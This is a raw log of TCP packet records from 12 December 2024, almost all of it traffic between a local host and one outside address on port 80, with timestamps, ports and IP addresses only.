Dec 12, 2024 16:48:18.598695993 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.598756075 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.600914001 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.601130962 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.601186037 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.603358030 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.603441954 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.603497982 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.605941057 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.606034040 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.606153965 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.667769909 CET	443	49875	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:18.667962074 CET	49875	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:18.670651913 CET	443	49875	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:18.670782089 CET	49875	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:18.675559998 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.675659895 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.675738096 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.676688910 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.676734924 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.676810980 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.676855087 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.678672075 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.678715944 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.678755045 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.678796053 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.680645943 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.680996895 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.681047916 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.682718039 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.682785988 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.682847977 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.684751987 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.684842110 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.684890032 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.686760902 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.686813116 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.686822891 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.686861992 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.688980103 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.689244032 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.689299107 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.690682888 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.690733910 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.690809965 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.690854073 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.692574978 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.692779064 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.692840099 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.694475889 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.694525003 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.694591045 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.694658041 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.696326971 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.696423054 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.696480989 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.698227882 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.698297977 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.698333025 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.698374987 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.700037003 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.700447083 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.700501919 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.701806068 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.701862097 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.701905012 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.701953888 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.703612089 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.703716993 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.703773975 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.705560923 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.705609083 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.705785990 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.705826044 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.707206964 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.707254887 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.707288027 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.707334995 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.708910942 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.709080935 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.709132910 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.710612059 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.710632086 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.710684061 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.712320089 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.712368965 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.712449074 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.712507963 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.714019060 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.714068890 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.714078903 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.714121103 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.715764046 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.715780973 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.715831995 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.717338085 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.717386961 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.717454910 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.717499018 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.719122887 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.719175100 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.719266891 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.719310999 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.720742941 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.720863104 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.720915079 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.722373009 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.722418070 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.722424984 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.722465992 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.724246025 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.724406004 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.724472046 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.725972891 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.726030111 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.726049900 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.726080894 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.727230072 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.727272034 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.727282047 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.727322102 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.728877068 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.728957891 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.729027033 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.730410099 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.730473995 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.730480909 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.730525970 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.731937885 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.732040882 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.732096910 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.733726978 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.733741999 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.733824015 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.735116005 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.735177994 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.735213041 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.735275984 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.736670017 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.736771107 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.736829996 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.738255024 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.738315105 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.738339901 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.738384962 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.739929914 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.740092993 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.740149021 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.741410017 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.741467953 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.741709948 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.741755009 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.742996931 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.743046999 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.743115902 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.743158102 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.744570017 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.744695902 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.744746923 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.746175051 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.746242046 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.746310949 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.746357918 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.747740984 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.747859001 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.747929096 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.749291897 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.749350071 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.749419928 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.749464035 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.750910044 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.750962019 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.751049042 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.751096964 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.752500057 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.752623081 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.752675056 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.754036903 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.754091024 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.754157066 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.754198074 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.755727053 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.755903006 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.755959988 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.757195950 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.757251978 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.757291079 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.757333040 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.758810997 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.758865118 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.759011030 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.759053946 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.760334015 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.760346889 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.760406017 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.867542982 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.867558002 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.867630005 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.867897034 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.867945910 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.868042946 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.868088007 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.869018078 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.869072914 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.869075060 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.869113922 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.870393038 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.870443106 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.870515108 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.870553970 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.871675968 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.871737957 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.871788979 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.872529030 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.872580051 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.872620106 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.872663021 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.873660088 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.873712063 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.873723030 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.873759031 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.874771118 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.874841928 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.874905109 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.874948978 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.875901937 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.876012087 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.876056910 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.877034903 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.877099037 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.877255917 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.877407074 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.878175020 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.878223896 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.878257036 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.878295898 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.879259109 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.879317999 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.879342079 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.879384995 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.880351067 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.880472898 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.880537033 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.881392956 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.881441116 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.881491899 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.881532907 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.882464886 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.882513046 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.882528067 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.882569075 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.883533955 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.883582115 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.883629084 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.884654045 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.884702921 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.884784937 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.884829044 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.885662079 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.885710001 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.885744095 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.885785103 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.886702061 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.886778116 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.886826038 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.887801886 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.887823105 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.887870073 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.888837099 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.888881922 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.888958931 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.889007092 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.889890909 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.889940023 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.889940977 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.889990091 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.890993118 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.891022921 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.891043901 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.891058922 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.891999006 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.892091036 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.892138004 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.893069983 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.893116951 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.893172979 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.893224001 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.894141912 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.894188881 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.894311905 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.894352913 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.895230055 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.895283937 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.895483971 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.895531893 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.896325111 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.896436930 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.896488905 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.897403002 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.897500038 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.897550106 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.898376942 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.898433924 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.898643970 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.898708105 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.899499893 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.899558067 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.899895906 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.899941921 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.900515079 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.900566101 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.900643110 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.900690079 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.901583910 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.901623964 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.901663065 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.901700020 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.902631998 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.902677059 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.902726889 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.902764082 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.903784037 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.903897047 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.903945923 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.904972076 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.905015945 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.905056000 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.905090094 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.905911922 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.905951977 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.905997992 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.906038046 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.906873941 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.906922102 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.906932116 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.906956911 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.907955885 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.908050060 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.908113956 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.908946037 CET	80	49872	31.41.244.11	192.168.2.10
